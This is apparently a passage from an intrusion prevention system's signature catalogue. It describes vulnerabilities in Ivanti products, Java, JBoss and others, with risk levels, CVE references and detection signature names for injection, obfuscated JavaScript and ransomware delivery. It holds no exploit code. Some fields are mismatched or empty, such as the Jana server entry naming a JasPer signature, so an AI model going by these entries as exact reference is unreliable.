sgpkg-ips-1793-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection

References:

CVE-2024-32845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32845

Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Insufficient validation of XML data when parsing HTTP requests causes an external entity injection vulnerability in Ivanti Endpoint Manager. A successful exploitation may lead to information disclosure.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection

References:

CVE-2024-37397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37397

Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager Mobile

Risk:

High

First detected in:

sgpkg-ips-1617-5242

Last changed:

sgpkg-ips-1617-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager Mobile

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Ivanti Endpoint Manager Mobile (formerly MobileIron). A remote attacker can use this vulnerability to access sensitive information, create new accounts, and change the server configuration. Chaining this vulnerability together with CVE-2023-35081 allows remote code execution.

Situation:

HTTP_CSU-Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078

References:

CVE-2023-35078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35078

Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781

References:

CVE-2024-34781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34781

Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user-supplied input when processing a request to the serverAsset component of Endpoint Manager. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection

References:

CVE-2024-32848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32848

Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability that, when successfully exploited, allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection-CVE-2024-32840

References:

CVE-2024-32840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32840

Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user-supplied input when processing a request to the serverMemory component of Endpoint Manager. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

HTTP_CSU-Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection

References:

CVE-2024-34779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34779

Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection

References:

CVE-2024-34785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34785

Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1814-5242

Last changed:

sgpkg-ips-1814-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability which allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection

References:

CVE-2024-34783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34783

Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1832-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability which can be exploited remotely to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection

References:

CVE-2024-50326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50326

Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection

References:

CVE-2024-29823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29823

Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-1765-5242

Last changed:

sgpkg-ips-1765-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability have been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection

References:

CVE-2024-29826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29826

Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability have been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager and can be exploited without authentication. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection

References:

CVE-2024-29827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29827

Ivanti-EPM-Agent-Portal-Command-Execution

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1803-5242

Last changed:

sgpkg-ips-1803-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Directory Traversal

Description:

Insufficient validation of received data causes a command execution vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute abitrary code on the target system.

Situation:

Generic_CS-Ivanti-EPM-Agent-Portal-Command-Execution

References:

CVE-2023-28324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28324

Ivanti-EPM-RecordGoodApp-SQLi-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected

Risk:

High

First detected in:

sgpkg-ips-1753-5242

Last changed:

sgpkg-ips-1753-5242

Platform:

Windows

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

A vulnerability in Ivanti Endpoint Manager, versions 2022 SU5 and prior, which allows remote attackers to execute arbitrary code on the target server, due to the the lack of proper validation of a user-supplied string before using it to construct SQL queries.

Situation:

HTTP_CRL-Ivanti-EPM-RecordGoodApp-SQLi-RCE

References:

CVE-2024-29824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29824

Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035

About this vulnerability:

A vulnerability in Ivanti MobileIron Sentry

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Generic

Software:

Ivanti MobileIron Sentry

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Ivanti MobileIron Sentry versions up to and including 9.18.0. Unauthenticated remote attackers can use this vulnerability to execute arbitrary code due to an insufficiently restricted API endpoint.

Situation:

HTTP_CRL-Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035

References:

CVE-2023-38035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38035

Ivanti-Virtual-Traffic-Manager-Authentication-Bypass-CVE-2024-7593

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Virtual Traffic Manager detected

Risk:

High

First detected in:

sgpkg-ips-1765-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Generic

Software:

Ivanti Virtual Traffic Manager

Type:

Input Validation

Description:

Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.

Situation:

HTTP_CRL-Ivanti-Virtual-Traffic-Manager-Authentication-Bypass

References:

CVE-2024-7593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7593

Jaff-Ransomware

About this vulnerability:	Jaff Ransomware
Risk:	High
First detected in:	sgpkg-ips-930-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	Jaff ransomware spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the Jaff ransomware.
Situation:	File-PDF_Suspected-Jaff-Ransomware-PDF

Jana-HTTP-Server-Msdos-Device-Name-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in Jana HTTP server

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

T. Hauck Jana Webserver

Type:

Malfunction

Description:

Jana HTTP Server for Windows is vulnerable to a Denial of Service (DoS) attack. An attacker can send a URL request specifying a MSDOS device name to the server to cause the server to crash.

Situation:

File-JPEG_Jasper-Jp2_Decode-Out-Of-Bounds-Read

References:

CVE-2001-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558

BID-2704
http://www.securityfocus.com/bid/2704

OSVDB-1817
http://www.osvdb.org/1817

Jason-Maloneys-Cgi-Guestbook-Command-Execution

About this vulnerability:	Jason Maloneys Cgi Guestbook Command Execution
Risk:	High
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Jason Maloney's CGI Guestbook
Type:	Input Validation
Description:	There exists a vulnerability in Jason Maloney's CGI Guestbook that can allow a remote attacker to execute commands.
Situation:	HTTP_CRL-Jason-Maloneys-Cgi-Guestbook-Command-Execution

Jasper-Jp2_Decode-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in JasPer

Risk:

High

First detected in:

sgpkg-ips-942-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

JasPer; Imagemagick

Type:

Malfunction

Description:

There exists an out-of-bounds array indexing vulnerability in JasPer. A remote attacker can use this to cause a denial of service condition or in the worst case gain access to sensitive information.

Situation:

References:

CVE-2017-9782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9782

BID-99171
http://www.securityfocus.com/bid/99171

JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430

About this vulnerability:

A vulnerability in JasperReports Server

Risk:

Moderate

First detected in:

sgpkg-ips-1542-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Generic

Software:

JasperSoft

Type:

Input Validation

Description:

A path traversal vulnerability has been reported in TIBCO JasperReports Server, Jaspersoft for AWS with Multi-Tenancy, and Jaspersoft Reporting and Analytics for AWS. An attacker with low user privileges could use this vulnerability to read arbitrary files and possibly execute code via local file inclusion.

Situation:

HTTP_CSU-JasperSoft-JasperReports-Server-Information-Disclosure-CVE-2018-5430

References:

CVE-2018-5430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5430

JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809

About this vulnerability:

A vulnerability in JasperReports Server

Risk:

Moderate

First detected in:

sgpkg-ips-1542-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Generic

Software:

JasperSoft

Type:

Input Validation

Description:

A path traversal vulnerability has been reported in TIBCO JasperReports Library, JasperReports Server, JasperReports Server for ActiveMatrix BPM, Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS.

Situation:

HTTP_CSU-JasperSoft-JasperReports-Server-Path-Traversal-CVE-2018-18809

References:

CVE-2018-18809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18809

Java-Archive-File-Upload

About this vulnerability:	Java archive file upload detected
Risk:	Moderate
First detected in:	sgpkg-ips-1112-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This situation can be used to disable uploading Java archive files to a web server to mitigate vulnerabilities like CVE-2016-1000031.
Situation:	File-Binary_Java-Archive-File-Upload

Java-Color-Management-Component-Remote-Code-Execution

About this vulnerability:

A vulnerability in Oracle Java

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Java Runtime Environment

Type:

Malfunction

Description:

A vulnerability in Oracle Java Color Management Component allows remote attacker to run arbitrary code in target environment.

Situation:

File-Binary_Java-Color-Management-Component-Remote-Code-Execution

References:

CVE-2013-1493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493

BID-58238
http://www.securityfocus.com/bid/58238

OSVDB-90737
http://www.osvdb.org/90737

Java-Deserialization-Privilege-Escalation

About this vulnerability:

A Java Deserialization Privilege Escalation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java SE

Type:

Insecure Configuration

Description:

A vulnerability in the Oracle Java Runtime Environment component of Oracle Java SE, versions 6 Update 18 and 5.0 Update 23, which allows remote attackers to to deserialize a MarshalledObject containing a custom classloader under a privileged context.

Situation:

References:

CVE-2010-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094

OSVDB-63484
http://www.osvdb.org/63484

Java-MixerSequencer-Buffer-Overflow

About this vulnerability:

A Java MixerSequencer Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Java Runtime Environment

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Oracle Java Runtime Environment, versions 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27, which allows remote attackers to execute arbitrary code via crafted MixerSequencer objects.

Situation:

References:

CVE-2010-0842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842

BID-39077
http://www.securityfocus.com/bid/39077

OSVDB-63493
http://www.osvdb.org/63493

Java-Related-File-Transfers

About this vulnerability:	A Java-related file transfer was detected
Risk:	Moderate
First detected in:	sgpkg-ips-473-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java Runtime Environment
Type:	Insecure Configuration
Description:	A Java-related file transfer was detected
Situation:	File-Binary_Java-Class-File File-Zip_JAR-File-Detected File-TextId_Java-Web-Start

Java-Rmi-Remote-Command-Execution

About this vulnerability:	A Java Rmi Remote Command Execution vulnerability.
Risk:	High
First detected in:	sgpkg-ips-712-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Java SE
Type:	Input Validation
Description:	A vulnerability in Oracle Java SE RMI Registry and RMI Activation services, which allow loading classes from any remote URL, which can result in a system compromise.
Situation:	Generic_CS-Java-Rmi-Remote-Command-Execution

Java-Runtime-Environment-JAX-WS-Remote-Code-Execution

About this vulnerability:

A Java Runtime Environment JAX-WS Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Insecure Configuration

Description:

A vulnerability in Oracle Java Runtime Environment, SE 7 Update 7 and earlier, which allows remote attackers to execute arbitrary java code outside the sandbox.

Situation:

References:

CVE-2012-5076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5076

BID-56054
http://www.securityfocus.com/bid/56054

OSVDB-86363
http://www.osvdb.org/86363

Java-Runtime-Environment-Remote-Code-Execution

About this vulnerability:

A Java Runtime Environment Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Insecure Configuration

Description:

A vulnerability in Oracle Java Runtime Environment, SE 7 Update 7 and earlier, which allows remote attackers to execute arbitrary java code outside the sandbox.

Situation:

References:

CVE-2012-5088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088

BID-56057
http://www.securityfocus.com/bid/56057

OSVDB-86352
http://www.osvdb.org/86352

Java-Trusted-Method-Chain-Privilege-Escalation

About this vulnerability:

A Java Trusted Method Chain Privilege Escalation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Runtime Environment

Type:

Insecure Configuration

Description:

A vulnerability in Oracle Java Runtime Environment, versions 6 prior to update 19 and version 5 prior to update 23, which allows remote attackers to run an untrusted method in a privileged context.

Situation:

HTTP_SS-Java-Unsigned-Applet-Execution
File-Zip_Metasploit-Shellcode-JAR
File-Text_Java-Unsigned-Applet-Execution

References:

CVE-2010-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840

OSVDB-63483
http://www.osvdb.org/63483

Java-Unsigned-Applet-Execution

About this vulnerability:

A vulnerability in Java Runtime Environment

Risk:

High

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment

Type:

Input Validation

Description:

A vulnerability in the Java Runtime Environment allows an attacker to run an applet outside of the Java Sandbox, by using a a trusted directory as "codebase" parameter, and a URL without dots as "code" parameter.

Situation:

References:

CVE-2010-4452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4452

JavaScript-Create-Noscript-Element

About this vulnerability:	Attempts to generate noscript elements in JavaScript
Risk:	Moderate
First detected in:	sgpkg-ips-661-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Attempts to create noscript-tags with javascript often indicate efforts to hide malicious code. Some browsers can also malfunction with such conflicting instructions.
Situation:	File-Text_JavaScript-Create-Noscript-Element

JavaScript-In-OLE

About this vulnerability:	An OLE file with embedded JavaScript detected
Risk:	Moderate
First detected in:	sgpkg-ips-453-4333
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	An OLE file with embedded JavaScript was seen. Embedded JavaScript in an OLE file can be completely legitimate but it can also be used for malicious purposes.
Situation:	File-OLE_Embedded-JavaScript-Obfuscated-Unescape-Function File-OLE_Embedded-JavaScript-Obfuscated-Eval-Function File-OLE_Embedded-JavaScript-In-OLE

JavaScript-In-PDF

About this vulnerability:	Javascript in PDF file
Risk:	Low
First detected in:	sgpkg-ips-208-2032
Last changed:	sgpkg-ips-1607-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	Javascript has been detected inside a PDF document. This in perfectly normal, but imposes some risks that are unwanted in certain organisations.
Situation:	E-Mail_BS-JavaScript-In-PDF E-Mail_BS-JavaScript-With-Open-Action-In-PDF HTTP_SS-JavaScript-In-PDF HTTP_SS-JavaScript-With-Open-Action-In-PDF File-PDF_JavaScript-In-PDF File-PDF_JavaScript-With-Open-Action-In-PDF File-PDF_JavaScript-With-Unescape-In-PDF File-PDF_JavaScript-Suspicious-Variable-Name File-PDF_Docm-File-And-JavaScript-In-PDF

JavaScript-Obfuscated-With-Hangul-Filler-Characters

About this vulnerability:	A suspicious webpage containing obfuscated JavaScript detected
Risk:	High
First detected in:	sgpkg-ips-1841-5242
Last changed:	sgpkg-ips-1841-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	This fingerprint detects the JavaScript code that was obfuscated using invisible Hangul Filter unicode characters. Such obfuscation technique has been actively abused in phishing attacks.
Situation:	File-Text_JavaScript-Obfuscated-With-Hangul-Filler-Characters

JavaScript-Obfuscation

About this vulnerability:	A script obfuscation method using JavaScript
Risk:	Moderate
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1771-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Javascript Injection
Description:	Most web browsers contain an embedded JavaScript interpreter. The interpreter allows a script to use various operations such as the exclusive or (XOR) for a block of data and pass the processed data back to the interpreter for execution. This feature enables a script to hide its real activity from inspection, and may be used to evade detection.
Situation:	HTTP_SS-JavaScript-Xor-Obfuscation-Method HTTP_SS-JavaScript-Escaped-Obfuscation-Method HTTP_SS-JavaScript-Dual-Custom-Function-Obfuscation-Method HTTP_SS-JavaScript-Packed-Obfuscation-Method HTTP_SS-JavaScript-Xor-One-Time-Pad-Obfuscation-Method HTTP_SS-JavaScript-Unescape-Obfuscation-Method-2 HTTP_SS-JavaScript-Unescape-Obfuscation-Method File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected-2 File-Text_Decimal-Encoded-JavaScript-2 File-Text_JavaScript-Unescape-Obfuscation-Access-With-Outdated-Browser File-Text_Wordpress-Suspicious-JavaScript-Iframe-Injection File-Text_Reverse-Obfuscated-Script File-Text_JavaScript-Split-Comment-Obfuscation File-Text_JavaScript-Reference-To-Program-Files-Resource File-Text_JavaScript-Eval-Function-Overridden File-Text_Suspicious-JScript-In-XML File-Text_Decimal-Encoded-JavaScript File-Text_Embedded-Assembly-Obvuscated-JavaScript File-Text_JavaScript-Strings-Reverse-Encoded File-Text_Malicious-VBScript-Detected File-Text_Encoded-JavaScript-Detected File-Text_Code-Protect-Obfuscated-JavaScript-Detected File-Text_QZX-Obfuscated-JavaScript-Detected File-Text_Jfogs-Obfuscated-JavaScript-Detected File-Text_Jjencode-Obfuscated-JavaScript-Detected File-Text_Aaencode-Obfuscated-Script-Detected File-Text_JavaScript-FromCharCode-Obfuscation-Detected File-Text_JavaScript-FromCharCode-Obfuscation-Detected-2 File-Text_Hex_Encoded_Url_Detected File-Text_JS-Obfuscator-Obfuscated-JavaScript-Detected File-Text_Script-Encoder-Obfuscated-Script-Detected File-Text_JS-Obfuscator-Obfuscated-Malicious-JavaScript-Detected File-Text_QZX-Obfuscated-Malicious-JavaScript-Detected File-PDF_JavaScript-Packed-Obfuscation-Method File-PDF_JavaScript-Unescape-Obfuscation-Method-2 File-PDF_JavaScript-Eval-Obfuscation-Method File-Text_JavaScript-Xor-Obfuscation-Method File-Text_JavaScript-Escaped-Obfuscation-Method File-Text_JavaScript-Dual-Custom-Function-Obfuscation-Method File-Text_JavaScript-Packed-Obfuscation-Method File-Text_JavaScript-Xor-One-Time-Pad-Obfuscation-Method File-Text_JavaScript-Unescape-Obfuscation-Method File-Text_JavaScript-Unescape-Obfuscation-Method-2 File-Text_JavaScript-Cookie-Xor-Obfuscation-Method File-Text_JavaScript-ActiveX-Class-Id-Obfuscation File-Text_JavaScript-Replace-Obfuscation File-Text_JavaScript-Alert-Exception-Obfuscation File-Text_JavaScript-Suspicious-External-Reference File-Text_JavaScript-ActiveX-Obfuscation File-Text_JavaScript-Object-Instantiation-Obfuscation File-Text_JavaScript-String-Split-Obfuscation File-Text_JavaScript-Innerhtml-Property-Obfuscation File-Text_Generic-JavaScript-Obfuscator File-Text_JavaScript-String-Value-Obfuscation File-Text_JavaScript-Document-Object-Obfuscation File-Text_JScript-Obfuscated-Reference File-Text_Hex-Encoded-String-In-Script-File File-Text_Malicious-Obfuscated-Script-File File-Text_Script-From-A-Suspicious-Site File-Text_JavaScript-Obfuscation-Method-Detected File-Text_VBScript-Execute-Chr-Obfuscation File-Text_VBScript-Array-Chr-Obfuscation File-Text_JavaScript-Inline-Comment-Obfuscation File-Text_JavaScript-Split-With-Non-Ascii-Separator

JavaScript-ShellCode-Generation

About this vulnerability:	Suspicious JavaScript code
Risk:	Moderate
First detected in:	sgpkg-ips-107-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Malfunction
Description:	JavaScript is a powerful programming language that is embedded into web browsers. It can be used to generate and hide shellcode that is used in exploits against the browser.
Situation:	HTTP_SS-JavaScript-ShellCode-Generation HTTP_SS-JavaScript-ShellCode-Generation-2 HTTP_SS-JavaScript-ShellCode-Generation-3 HTTP_SS-JavaScript-ShellCode-Generation-4 File-Text_JavaScript-ShellCode-Generation File-Text_JavaScript-ShellCode-Generation-2 File-Text_JavaScript-ShellCode-Generation-3 File-Text_JavaScript-ShellCode-Generation-4

JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

About this vulnerability:	Multiple encodings used with JavaScript String.fromCharCode detected
Risk:	Moderate
First detected in:	sgpkg-ips-402-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	Multiple encodings used with the JavaScript String.fromCharCode function.
Situation:	HTTP_SS-JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation

JavaScript-Suspicious-Function-Name

About this vulnerability:	A suspicious function name in script was detected
Risk:	High
First detected in:	sgpkg-ips-445-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Malfunction
Description:	A suspicious function name in script was detected.
Situation:	File-Text_HTML-Suspicious-Function-Name File-Text_JavaScript-Suspicious-Function-Name-Exploit File-Text_JavaScript-Suspicious-Function-Name-Crash File-Text_JavaScript-Suspicious-Function-Name-Heapspray

JavaScript_Injected-Wordpress

About this vulnerability:	JavaScript malicious redirection in wordpress sites
Risk:	Moderate
First detected in:	sgpkg-ips-1389-5242
Last changed:	sgpkg-ips-1389-5242
Platform:	Windows
Software:	<os>
Type:	Javascript Injection
Description:	Traffic that resembles known injected JavaScript pattern detected. The malicious script has been observed to be injected into vulnerable WordPress sites, where it redirects to malicious sites
Situation:	File-Text_JavaScript_Injected-Wordpress

JAWS-Command-Execution

About this vulnerability:	A vulnerability in JAWS
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	JAWS
Type:	Malfunction
Description:	There exists a remote code execution vulnerability in JAWS content management system. Successful exploitation could lead in arbitrary code execution.
Situation:	HTTP_CRL-JAWS-Command-Execution

Jboss-Authentication-Bypass

About this vulnerability:

A Jboss Authentication Bypass vulnerability.

Risk:

High

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

JBoss

Type:

Insecure Configuration

Description:

A vulnerability in JBoss, versions 4.x and 5.x, which allows remote attackers to bypass authentication and gain administrative access via direct requests.

Situation:

HTTP_CRL-Jboss-Authentication-Bypass

References:

CVE-2007-1036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1036

OSVDB-33744
http://www.osvdb.org/33744

Jboss-EAP/AS-Remoting-Unified-Invoker-RCE

About this vulnerability:	A vulnerability in JBoss.
Risk:	High
